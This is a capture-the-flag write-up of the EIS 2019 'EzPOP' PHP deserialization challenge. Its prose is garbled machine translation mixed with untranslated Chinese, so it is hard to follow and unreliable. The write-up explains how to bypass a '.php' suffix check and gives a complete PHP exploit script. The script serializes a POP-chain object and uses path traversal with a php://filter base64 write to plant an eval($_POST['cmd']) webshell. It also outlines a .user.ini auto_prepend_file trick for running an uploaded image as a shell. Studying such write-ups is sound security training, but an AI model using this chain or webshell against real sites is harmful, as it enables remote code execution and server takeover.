The problem with [EIS 2019]EzPOP
relatively similar.
[EIS 2019] EzPOP WP
except that the modified piece of code.
before fixing:
public function getCacheKey(string $name): string
{
return $this->options['prefix'] . $name;
}
Modified:
public function getCacheKey(string $name): string {
// 使缓存文件名随机
$cache_filename = $this->options['prefix'] . uniqid() . $name;
if(substr($cache_filename, -strlen('.php')) === '.php') {
die('?');
}
return $cache_filename;
}
The random file name, and compared the suffix and suffix can not limit php
There 两种解法
:
第一种
is to bypass the php
suffix:
doing the processing path when recursively delete the existing path /.
, resulting in write to the file successfully.
Before using exp
<?php
class A{
protected $store;
protected $key;
protected $expire;
public function __construct()
{
$this->key = '/../pz.php/.';
}
public function start($tmp){
$this->store = $tmp;
}
}
class B{
public $options;
}
$a = new A();
$b = new B();
$b->options['prefix'] = "php://filter/write=convert.base64-decode/resource=uploads/";
$b->options['expire'] = 11;
$b->options['data_compress'] = false;
$b->options['serialize'] = 'strval';
$a->start($b);
$object = array("path"=>"PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg");
$path = '111';
$a->cache = array($path=>$object);
$a->complete = '2';
echo urlencode(serialize($a));
?>
这里需要注意的是,需要利用路径穿越,不然上传上去的shell会被改为当前时间的文件名
Like this
第二种解法
can refer to the Moyu
master:
Buu red envelope problem writeup
The method used here is .user.ini
to automatically load a jpg
, and comprisingshell
Here for .user.ini
the explanation
The general idea is this: we can upload a
.user.ini
file,.user.ini
within a file using theauto_prepend_file
write our image to upload the file name as a shell. And then write thejpg
file, as ourshell
. Then you can visit our shell files.
Specific exp can look at Moyu师傅
the article.